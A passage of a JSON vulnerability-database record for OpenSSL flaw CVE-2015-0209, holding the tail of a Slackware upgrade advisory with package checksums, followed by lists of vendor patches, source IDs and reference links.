openssl-0.9.8zf-x86_64-1_slack13.0.txz\nfe5f33f4d2db08b4f8d724e62bf6e514 openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n1ef0ba15454da786993361c927084438 openssl-0.9.8zf-i486-1_slack13.1.txz\n2b3e20bcaa77f39512b6edcbc41b5471 openssl-solibs-0.9.8zf-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\nf8fae10a1936cf900d362b65d9b2c8df openssl-0.9.8zf-x86_64-1_slack13.1.txz\n0093e35c46382eeef03a51421895ed65 openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7d4dd0f76252c98622a5f5939f6f0674 openssl-0.9.8zf-i486-1_slack13.37.txz\ne5cde01c0773ac78d33964e4107878df openssl-solibs-0.9.8zf-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n379424e15bd378e00a5ba0c709432429 openssl-0.9.8zf-x86_64-1_slack13.37.txz\n54832ad7e5440ce1c496be47fec9140d openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\n8abafa33d2bf90b6cd8be849c0d9a643 openssl-1.0.1m-i486-1_slack14.0.txz\nbac56213a540586d801d7b57608396de openssl-solibs-1.0.1m-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\nb4c6c971e74b678c68671feed18fa7dc openssl-1.0.1m-x86_64-1_slack14.0.txz\nacac871e22b5de998544c2f6431c0139 openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\nc1f47f1f1ba5a13d6ac2ef2ae48bfb4c openssl-1.0.1m-i486-1_slack14.1.txz\nb7b1761ae1585f406d303273812043d3 openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n1c6e11e2e3454836d5a3e9243f7c7738 openssl-1.0.1m-x86_64-1_slack14.1.txz\n25b7a704816a2123463ddbfabbc1b86d openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n0926b2429e1326c8ab9bcbbda056dc66 a/openssl-solibs-1.0.1m-i486-1.txz\nb6252d0f141eba7b0a8e8c5bbdc314f0 n/openssl-1.0.1m-i486-1.txz\n\nSlackware x86_64 -current packages:\n99b903f556c7a2d5ec283f04c2f5a650 a/openssl-solibs-1.0.1m-x86_64-1.txz\n9ecb47e0b70bd7f8064c96fb2211c4b7 n/openssl-1.0.1m-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1m-i486-1_slack14.1.txz openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", "sources": [ { "db": "NVD", "id": "CVE-2015-0209" }, { "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "db": "BID", "id": "73239" }, { "db": "VULMON", "id": "CVE-2015-0209" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131023" }, { "db": "PACKETSTORM", "id": "130916" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130932" }, { "db": "PACKETSTORM", "id": "131585" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-0209", "trust": 3.0 }, { "db": "JUNIPER", "id": "JSA10680", "trust": 1.4 }, { "db": "BID", "id": "73239", "trust": 1.4 }, { "db": "SECTRACK", "id": "1031929", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10110", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU95877131", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-001879", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.4 }, { "db": "VULMON", "id": "CVE-2015-0209", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133318", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131023", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130916", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130933", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132763", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130932", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131585", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0209" }, { "db": "BID", "id": "73239" }, { "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131023" }, { "db": "PACKETSTORM", "id": "130916" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130932" }, { "db": "PACKETSTORM", "id": "131585" }, { "db": "NVD", "id": "CVE-2015-0209" } ] }, "id": "VAR-201503-0052", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44373096375000004 }, "last_update_date": "2024-07-23T20:49:46.592000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html" }, { "title": "HT204942", "trust": 0.8, "url": "http://support.apple.com/en-us/ht204942" }, { "title": "HT204942", "trust": 0.8, "url": "http://support.apple.com/ja-jp/ht204942" }, { "title": "cisco-sa-20150320-openssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150320-openssl" }, { "title": "HPSBGN03306 SSRT102007", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04626468" }, { "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831", "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95877131/522154/index.html" }, { "title": "NV15-015", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-015.html" }, { "title": "Fix a failure to NULL a pointer freed on error.", "trust": 0.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a" }, { "title": "Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150319.txt" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Oracle Critical Patch Update Advisory - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "Bug 1196737", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1196737" }, { "title": "OpenSSL Updates of 19 March 2015", "trust": 0.8, "url": "https://access.redhat.com/articles/1384453" }, { "title": "RHSA-2015:0715", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0715.html" }, { "title": "RHSA-2015:0716", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0716.html" }, { "title": "RHSA-2015:0752", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0752.html" }, { "title": "SA92", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa92" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "January 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update" }, { "title": "TLSA-2015-12", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-12j.html" }, { "title": "OpenSSL\u306b\u8907\u6570\u306e\u8106\u5f31\u6027 (19 Mar 2015)", "trust": 0.8, "url": "http://www.seil.jp/support/security/a01545.html" }, { "title": "cisco-sa-20150320-openssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128874_cisco-sa-20150320-openssl-j.html" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2537-1" }, { "title": "Amazon Linux AMI: ALAS-2015-498", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-498" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "Tenable Security Advisories: [R6] OpenSSL \u002720150319\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-04" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (March 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150320-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Symantec Security Advisories: SA92 : OpenSSL Security Advisory 19-Mar-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=07adc2b6f5910b64efc7296f227b9f10" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-0209 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0209" }, { "db": "JVNDB", "id": "JVNDB-2015-001879" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "db": "NVD", "id": "CVE-2015-0209" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "https://www.openssl.org/news/secadv_20150319.txt" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201503-11" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/73239" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1196737" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152844.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152733.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152734.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3197" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2015-03/msg00062.html" }, { "trust": 1.1, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15%3a06.openssl.asc" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00022.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2537-1" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031929" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0716.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:063" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0752.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0715.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142841429220765\u0026w=2" }, { "trust": 1.1, "url": "https://access.redhat.com/articles/1384453" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-may/156823.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-may/157177.html" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html" }, { "trust": 1.1, "url": "http://support.apple.com/kb/ht204942" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa92" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143213830203296\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-1089.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10680" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10110" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnvu95877131" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0209" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/4885/security-advisory-alienvault-v5-0-" }, { "trust": 0.3, "url": "https://support.asperasoft.com/entries/93038317-security-bulletin-vulnerabilities-in-openssl" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/apr/37" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/aug/137" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/aug/134" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/aug/136" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04679334" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005226" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005241" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005254" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958089" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962334" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098144" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020693" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory13.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963024" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-04-16.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903752" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701028" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21701256" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10680\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21882710" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022183" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964164" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903799" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022382" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099273" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902449" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902277" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882644" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902544" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21702160" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022367" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883028" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699778" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902519" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020716" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022103" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902673" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883593" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099272" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700167" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902433" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21722409" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700411" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960212" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960210" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21883249" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964410" }, { "trust": 0.3, "url": "https://support.f5.com/kb/en-us/solutions/public/16000/300/sol16323.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964686" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?rs=630\u0026uid=swg21970748" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960588" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960668" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903261" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903729" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701326" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701334" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882955" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0291" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1787" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0290" }, { "trust": 0.3, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2537-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150320-openssl" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=39581" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c54de3da8602433283d55e7369" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-676ddad17a06423589ee8889d0" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-72d53359c85340f899e81986a7" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0289" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0293" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0208" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0291" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0209" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0207" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0288" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": 